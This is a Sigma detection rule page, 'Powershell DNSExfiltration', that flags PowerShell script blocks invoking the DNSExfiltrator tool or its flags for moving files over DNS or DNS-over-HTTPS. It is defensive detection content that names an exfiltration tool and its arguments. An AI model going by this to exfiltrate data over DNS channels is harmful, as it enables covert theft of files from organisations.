← Back to Explore
sigmahighHunting
Powershell DNSExfiltration
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
Detection Query
selection_cmdlet:
- ScriptBlockText|contains: Invoke-DNSExfiltrator
- ScriptBlockText|contains|all:
- " -i "
- " -d "
- " -p "
- " -doh "
- " -t "
condition: selection_cmdlet
Author
frack113
Created
2022-01-07
Data Sources
windowsps_script
Platforms
windows
References
Tags
attack.exfiltrationattack.t1048
Raw Content
title: Powershell DNSExfiltration
id: d59d7842-9a21-4bc6-ba98-64bfe0091355
status: test
description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh
- https://github.com/Arno0x/DNSExfiltrator
author: frack113
date: 2022-01-07
tags:
- attack.exfiltration
- attack.t1048
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_cmdlet:
- ScriptBlockText|contains: 'Invoke-DNSExfiltrator'
- ScriptBlockText|contains|all:
- ' -i '
- ' -d '
- ' -p '
- ' -doh '
- ' -t '
condition: selection_cmdlet
falsepositives:
- Legitimate script
level: high